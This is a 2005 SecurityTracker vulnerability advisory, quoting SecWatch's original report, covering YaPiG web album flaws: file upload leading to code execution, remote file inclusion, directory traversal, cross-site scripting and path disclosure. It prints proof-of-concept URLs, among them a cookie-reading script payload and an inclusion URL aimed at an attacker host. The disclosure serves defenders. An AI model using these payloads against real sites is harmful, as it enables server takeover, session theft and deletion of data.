Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
YaPiG Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Create/Delete Directories and Let Remote Users Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1014103
|
|
SecurityTracker URL: http://securitytracker.com/id?1014103
|
|
CVE Reference: CAN-2005-1881
, CAN-2005-1882
, CAN-2005-1883
, CAN-2005-1884
, CAN-2005-1885
, CAN-2005-1886
(Links to External Site)
|
Updated: Jun 9 2005
|
Original Entry Date: Jun 5 2005
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 0.92b, 0.93u, and 0.94u
|
Description: SecWatch reported several vulnerabilities in YaPiG. A remote user can conduct cross-site scripting attacks and determine the installation
path. A remote authenticated user can execute arbitrary PHP code and operating system commands on the target system and can create
and delete directories on the target system.
The 'upload.php' script does not properly validate file extensions of uploaded image files. A remote authenticated user can upload
files containing arbitrary content, such as PHP code, and then cause the target web server to execute the files. The PHP code,
including operating system commands, will run with the privileges of the target web service.
Some demonstration exploit URLs
are provided:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/
The
script also fails to properly validate user-supplied input in the 'dir' parameter before using the data as part of rmdir() and mkdir()
function calls. A remote authenticated user can submit specially crafted parameter values containing '../' directory traversal
characters to create and delete arbitrary directories located outside of the gallery directory.
Some demonstration exploit URLs
are provided:
http://[target]/upload.php?step=rmdir&dir=../folder
http://[target]/upload.php?step=mkdir&dir=../folder
Several
scripts include files relative to parameters that can be modified by remote users. A remote user can supply a specially crafted
parameter value to cause arbitrary PHP code from a remote site to be included and executed by the target web service.
The 'view.php'
script does not properly validate user-supplied input in the 'phid' parameter. A remote user can create a specially crafted URL
that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will
originate from the site running the YaPiG software and will run in the security context of that site. As a result, the code will
be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently
submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A demonstration
exploit URL is provided:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Other
parameters are affected when a remote user adds a new comment.
The system stores plain text authentication data on the target
user's browser if the '$USE_COOKIES=true;' parameter is set. A local user on the target user's system can obtain authentication
data.
A remote user can also supply the following type of URL to cause the system to disclose the installation path:
http://[target]/view.php?gid=1&phid=alpha
The vendor was notified on May 30, 2005, without response.
SecWatch reported this vulnerability. An anonymous person discovered
the vulnerability.
The original advisory is available at:
http://secwatch.org/advisories/secwatch/20050530_yapig.txt
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
YaPiG software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as
the target user.
A remote authenticated user can upload scripting code to the target system and execute the code.
A remote
authenticated user can create and delete directories on the target system.
A remote authenticated user can execute arbitrary
PHP code and operating system commands on the target system with the privileges of the target web service.
A remote user can
determine the installation path.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: yapig.sourceforge.net/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: info@secwatch.co.uk
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 4 Jun 2005 23:43:30 +0100 (BST)
From: info@secwatch.co.uk
Subject: YaPiG Remote Arbitrary File Inclusion,
|
======================================================================
SecWatch 04/06/2005
YaPiG Remote Arbitrary File Inclusion, Cross-Site Scripting
and Information Disclosure Vulnerabilities
======================================================================
Table of Contents
Product Introduction.................................................1
Affected ............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8
======================================================================
1) Introduction
Homepage: http://yapig.sourceforge.net/
Overview: YaPiG is a simple but powerful web album.
Advisory: http://secwatch.org/advisories/secwatch/20050530_yapig.txt
SWID: 1010769
======================================================================
2) Affected
YaPiG version 0.92b, 0.93u and 0.94u.
Prior versions may also be affected.
======================================================================
3) Severity
Rating: Less Critical
Impact: Exposure of system information
System access
Manipulation of data
Cross Site Scripting
Where: From remote
Action: Public disclosure
======================================================================
4) Description of Vulnerabilities
Multiple input validation and design vulnerabilities in YaPiG have been
reported, which can be exploited by remote users to execute arbitrary
code, conduct cross-site scripting attacks, disclose sensitive
information, create and remove arbitrary directories and potentially gain
administrative access to the web album.
The "upload.php" script fails to verify the extension of uploaded images,
a remote, authenticated user can upload arbitrary files (e.g. php files)
to execute arbitrary commands on the target system with privileges of the
target web server.
Numerous scripts insecurely include scripts, if register_globals is
enabled a remote, unauthenticated user can include arbitrary files from
local and remote resources.
The "view.php" script fails to correctly sanitise user-supplied input
passed to the "phid" parameter, which a remote user can exploit to execute
arbitrary script code in the security context of an affected website, as a
result the code will be able to access any of the target user"s cookies,
access data recently submitted by the target user via web form to the
site, or take actions on the site acting as the target user.
The "view.php" script also fails to sanitise user-supplied input POSTed to
various parameters when adding a new comment, which can also be exploited
to conduct cross-site scripting attacks.
The "view.php" script also discloses the full installation path upon a
non-integer value being passed to the "phid" parameter.
The "upload.php" script fails to validate user-supplied input passed to
the "dir" parameter before being used in "rmdir()" and "mkdir()" calls.
A
remote, authenticated user can create and remove arbitrary directories
outside of the gallery directory via the common "../" directory traversal
characters.
If "$USE_COOKIES=true;" is set (non-default) authentication details are
stored in plain text in session cookies. A local user can access browser
cookies to gain administrative access to the web album.
Various other scripts/parameters are reportedly affected by similar issues.
======================================================================
5) Proof of Concept
Cross-Site Scripting:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Arbitrary File Inclusion:
Version 0.92b:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u:
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/
Arbitrary Directory Removal:
http://[target]/upload.php?step=rmdir&dir=../folder
Arbitrary Directory Creation:
http://[target]/upload.php?step=mkdir&dir=../folder
Information Disclosure:
http://[target]/view.php?gid=1&phid=alpha
======================================================================
6) Solution
Edit source manually to ensure user-supplied input is correctly sanitised.
Filter malicious characters and character sequences via a HTTP proxy or
firewall with URL filtering capabilities.
Production systems should not display errors to clients.
Set 'register_globals=Off' in php.ini.
Use another product.
======================================================================
7) Time Line
29/05/2005 - Infomation reported to SecWatch.
30/05/2005 - Information validated by SecWatch.
Vendor notified, no response.
02/06/2005 - Vendor notified via alternative e-mail address, no response.
04/06/2005 - Public disclosure.
======================================================================
8) Credits
Discovered by an anonymous person, reported via SecWatch.
|
|
Go to the Top of This SecurityTracker Archive Page
|
